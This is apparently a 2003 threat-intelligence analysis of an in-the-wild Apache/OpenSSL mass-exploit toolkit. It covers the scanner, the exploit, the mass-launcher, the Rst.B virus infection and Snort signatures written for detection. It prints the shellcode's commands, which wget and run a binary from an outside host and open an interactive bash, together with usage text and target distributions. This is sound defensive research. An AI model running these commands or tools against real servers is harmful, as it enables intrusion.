by LURHQ Threat Intelligence Group
Introduction
This paper offers a brief analysis of an Apache/OpenSSL
mass exploiter found in the wild. In recent history many
people have inquired in public forums as to the origin
and functionality of this particular exploit. LURHQ Threat Intelligence Group
has taken steps to track the origin and define the functionality
of this exploit. What we found is that there are at least
two distinct tools scanning the Internet using the same
HTTP GET request, in the course of the same exploit. For
one tool the source code is available. The other is available
as a binary only, and is the tool we chose to analyze
for this paper.
ATD – Mass Exploiter
We chose the term mass exploiter rather than autorooter,
primarily because the software is not fully automated,
and when run does not yield a root shell. It is however
a powerful engine for mass-hacking webservers, and is
quite dangerous due to the wide number of Linux distributions
it can compromise in a single run. We have prefixed
it with the name ATD simply because that is the name
of the tar archive in which it is packaged. We have
chosen not to do an in-depth analysis of the authors
affiliation with any particular hacking group; however
suffice it to say the origin of the package and at least
one of the authors is Romania, and there are several
hacking groups from that country currently defacing
countless Linux-hosted websites worldwide. This mass
exploiter may be at the root of that activity.
Here are the details of the package:
Filename: atd.tgz
Size: 67,538 bytes
Md5sum: 66d49e2bd0c810adb0ef6b275bf5769c
Files contained in the package:
drwxr-xr-x 500/500 0 2002-11-21 05:57:55 atd/
-rwxr-xr-x root/root 30971 2002-11-20 00:02:19 atd/mass
-rwxr-xr-x root/root 27702 2002-11-20 02:47:40 atd/osslmass2
-rwxr-xr-x root/root 23424 2002-11-21 05:57:57 atd/vuln
-rwxr-xr-x root/1001 124850 2002-11-21 05:46:53 atd/openssl-too
Md5sums of files inside the package:
c81b35baa84d9468536522c729498403 mass
4d92ff9b27ffcb5acdd5162d847a9546 openssl-too
2b7d8b805512d6c7331bdbc38b647690 osslmass2
c6cb9fe3eaae673c880cf2b8461368f7 vuln
Virus Warning
At this point it should be mentioned that all the files
in this package are infected with the Linux/Rst.B virus.
If you run these files on your system all the executable
files in the same directory will be infected. If you make
the mistake of running them as root, files in your /bin
directory will also be infected. Although the payload
is not as bad as it could be, this virus opens up a backdoor
on your system, so if you obtain copies of the files described
here for further analysis, treat them with caution. We
will not be providing the files or links to them in this
paper, but disassembly with string data is provided in
the file section toward the end of this analysis.
File Functions and Characteristics
mass
– This is the scanner component. It launches into
the background, saving its process id in “mass.pid”.
Given a range of IP addresses, it will attempt to connect
to each one on tcp port 443. If a listening server is
found, it will then connect on port 80 and try to determine
the server version from the HTTP headers. It saves information
in “mass.log” about each host it finds.
When run, the program gives the following usage output:
: Mass scanner - by Silviu
: This is an SSL IP scanner that can be placed into background
: it keeps logs of each ip found, and the apache/*nix version
USAGE: ./mass [OPTIONS] <ip-mask>
The <ip-mask> is the class to scan (eg: 192.168.1.* 192.168.*.* 192.*.*.*)
The options are:
-p --port=<#> - the port to check (default 443)
-s --sockets=<#> - # of sockets to use (default 300)
-t --connect-timeout=<#> - connect timeout in seconds (default 10)
-T --receive-timeout=<#> - receive timeout in seconds (default 40)
-l --log=<file> - log file (default mass.log)
-b --background - fall into background
-c --clean-log - log only the ips.
-h --help - display this help and exit.
Examples:
./mass 192.168.0.1
./mass 192.168.10.* --sockets=100
./mass 192.168.*.* -s 200 --background
./mass 192.*.*.* -s 800
Here is tcpdump output of the request on port 80:
11:26:20.494868 192.168.1.2.38735 > 192.168.1.8.80: P 1:27(26) ack 1 win 5488
<nop,nop,timestamp 52028296 4220465> (DF)
0x0000 4500 004e 819f 4000 4006 35b0 c0a8 0102 E..N..@.@.5.....
0x0010 c0a8 0108 974f 0050 dfc3 6216 79e8 9783 .....O.P..b.y...
0x0020 8018 1570 4da6 0000 0101 080a 0319 e388 ...pM...........
0x0030 0040 6631 4745 5420 2f73 756d 7468 696e .@f1GET./sumthin
0x0040 2048 5454 502f 312e 300d 0a0d 0a00 .HTTP/1.0.....
The scanned host would have a request similar to the
following logged in its httpd access log:
www.example.com xxx.xxx.xxx.xxx - - [04/Apr/2003:13:44:28 -0500]
"GET /sumthin HTTP/1.0" 404 282 "-" "-"
One can only speculate as to why the author of the
scanner used such an identifiable trademark when a simple
“HEAD /” or “GET /” would have
achieved the same result while blending in with the
ordinary requests a webserver might see.
openssl-too
– This is the actual exploit, a variant of the
“openssl-too-open” exploit by Solar Eclipse.
For all intents and purposes, it is the same exploit
code, except the output has been translated to Romanian,
the authorship line has been changed, and the command
line downloads and runs the an executable from the packager's
site before launching a shell.
: OpenSsl Exploit ... Folositi-l Pe Riscul Vostru
by Silviu <Silviu@Silviu.ph>
Folosire: ./openssl-too [Optiuni] <host>
-a <arch> Arhitecturã (default is 0x00)
-p <port> SSL port (default is 443)
-c <N> Numãr Minim De Conexiuni (default is 30)
-m <N> Numãr Maxim De Conexiuni (default is 50)
-v Verbose Mode
Arhitecturi:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)
Example: ./openssl-too -a 0x01 -v localhost
./openssl-too -p 1234 192.168.0.1 -c 40 -m 80
The shellcode executes the following commands as the
apache user on the victim host:
TERM=xterm
cd /tmp/
wget -dbc silviu.250free.com/x/qd >>/dev/null
sleep 8
rm -rf wget*
chmod +x qd
./qd >>/dev/null
rm -rf /tmp/qd
export TERM=xterm
exec bash -i
The site in the wget command above has already been
deleted, so we are unable to say for sure what the “qd”
binary does. However, it is fairly likely that it is
the server component of the “Q” trojan by
Mixter. For more information, see the analysis
of Q by Craig Baltes.
After downloading and launching qd, the exploit forks
an interactive bash shell as does the standard openssl-too-open
exploit. However, in this shell five more commands are
run automatically to gather system info before releasing
interactive control to the attacker. This also deviates
from the normal openssl-too-open behavior. The commands
are as follows:
uname -a
cat /etc/issue
cat /etc/*-release
id
w
At this point the attacker would likely download a
local root exploit from another compromised system and
fully own the box.
osslmass2
– This program reads mass.log and runs
openssl-too with the proper arguments against all the
vulnerable hosts listed. An attacker can run the “mass”
program, leave, come back hours later and run this program
to gain access to host after host with no real effort.
Usage output is as follows:
: osslmass2.c - by Inkubus, the credits goes to Solar Eclipse and Phill
: osslmass2 tries to exploit a `mass.log' and attacks vulnerable IPs
USAGE: ./osslmass2 <log-file>
vuln
– This program reads mass.log and prints out vulnerable
hosts.
: vuln.c - by Silviu
: vuln analizes a `mass.log' and displays the vulnerable IPs
: and the server version
USAGE: ./vuln <log-file>
IDS Signatures
We have written the following Snort signature to detect
the scanner:
alert tcp $EXTERNAL_NET
any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-MISC
OpenSSL-Mass scan"; flow:to_server,established; content:"GET
/sumthin HTTP/1.0"; offset:0; depth:21; classtype:attempted-recon;
reference:url,www.lurhq.com/atd.htm; sid:1000001; rev:1;)
The following Snort signature has been part of the
default Snort ruleset for several months and will detect
a successful attack from this exploit or any of the
other existing worms/exploits that utilize the openssl-too-open.c
code as a base:
alert tcp $EXTERNAL_NET
any -> $HTTP_SERVERS 443 (msg:"MISC OpenSSL Worm
traffic"; flow:to_server,established; content:"TERM=xterm";
nocase; classtype:web-application-attack; reference:url,www.cert.org/advisories/CA-2002-27.html;
sid:1887; rev:2;)
Although Rst.b is not the primary focus of this paper,
we have developed Snort signatures for it as well, because
the standard Snort rulebase is lacking any signatures
for this backdoor which has been widely deployed for
over a year.
This Snort signature will alert when someone scans
your network looking for Linux/Rst.b infected hosts:
alert udp $EXTERNAL_NET
any -> $HOME_NET any (msg:"BACKDOOR Linux/Rst.b
Scan"; dsize: <9; content:"|44 4f 4d 02|";
depth:4; classtype:attempted-recon; reference:url,www.lurhq.com/atd.htm;
sid:1000002; rev:1;)
This Snort signature will alert when a remote host
attempts to run a shell command using the Rst.b backdoor,
whether the remote host is actually infected or not:
alert udp $EXTERNAL_NET
any -> $HOME_NET any (msg:"BACKDOOR Linux/Rst.b
Shell Command"; content:"|44 4f 4d 01|";
depth:4; classtype:misc-activity; reference:url,www.lurhq.com/atd.htm;
sid:1000003; rev:1;)
This Snort signature will alert when a host on your
network replies to a scan for Linux/Rst.b, indicating
an infection:
alert udp $HOME_NET any
-> $EXTERNAL_NET 4369 (msg:"BACKDOOR Linux/Rst.b
Reply"; content:"DOM"; dsize:3; classtype:misc-activity;
reference:url,www.lurhq.com/atd.htm; sid:1000004; rev:1;)
The signatures above are only for Snort version 1.9
and above.
Analysis Files
Disassemblies of the binaries were made using dasm.
The binaries were first cleaned of the Rst.b virus so
they could be analyzed in their original state. The dasm
output files are available here:
http://www.lurhq.com/mass.dasm.txt
http://www.lurhq.com/openssl-too.dasm.txt
http://www.lurhq.com/osslmass2.dasm.txt
http://www.lurhq.com/vuln.dasm.txt
Source code for the files in this package is not known
to be publicly available except for openssl-too, which
is really openssl-too-open.c with a few minor changes.
Summary
This is a fairly simple but powerful exploit package,
which is probably responsible for mass defacements of
Linux-hosted websites worldwide. Although it only provides
a shell as the apache user, it might as well be a remote
root exploit due to the existence of the ptrace local
root exploit which works on every platform this exploit
targets. The fact that it is infected with the Rst.b virus
also makes it a somewhat bigger threat.
It is unknown why the files are infected with the Rst.b
virus, but all copies of this package we have found
in the wild were infected. The script kiddies who use
this package probably do not know it is infected and
it is likely infecting all their other tools as well.
The Rst.b virus may leave a backdoor running on systems
it infects, but not always. This is something that the
two Rst.b analyses referenced below have overlooked.
In order for the backdoor to be activated, the virus
must be run as root and the infected system must not
be using devfs. This is because devfs causes file creation
in the /dev directory to fail with “permission
denied”. When the virus is unable to create the
files /dev/hdx1 and /dev/hdx2 it exits before starting
the backdoor code. However, since many of the exploit
targets do not use devfs by default, it is probable
that the author of Rst.b has gained potential root access
on tens of thousands of systems over the past year and
a half using the work of oblivious lower-level script-kiddies.
References
“CERT® Advisory CA-2002-23 Multiple Vulnerabilities
In OpenSSL.”
http://www.cert.org/advisories/CA-2002-23.html.
July 30, 2002.
Baltes, Craig. “Re: Covert Channels”.
http://lists.jammed.com/pen-test/2002/10/0027.html.
October 17, 2002.
Baltes, Craig. “GCIA Practical Assignment.”
http://www.giac.org/practical/GCIA/Craig_Baltes_GCIA.doc.
October 11, 2002.
Eclipse, Solar. “openssl-too-open.c.”
http://packetstormsecurity.nl/filedesc/openssl-too-open.tar.html.
September 17, 2002.
Lee, Chia Ling. “Port 443 and Openssl-too-open.”
http://www.giac.org/practical/GCIH/Chia_Ling_Lee_GCIH.pdf.
November 29, 2002.
Lockdown. “RST-variant analysis.”
http://www.lockeddown.net/rst-expl.txt.
December 19, 2001.
“Qualys Security Alert QSA-2002-01-01 Remote
Shell Trojan b (RST.b).”
http://www.qualys.com/alert/QSA-2002-01-01.pdf.
January 9, 2002.
|
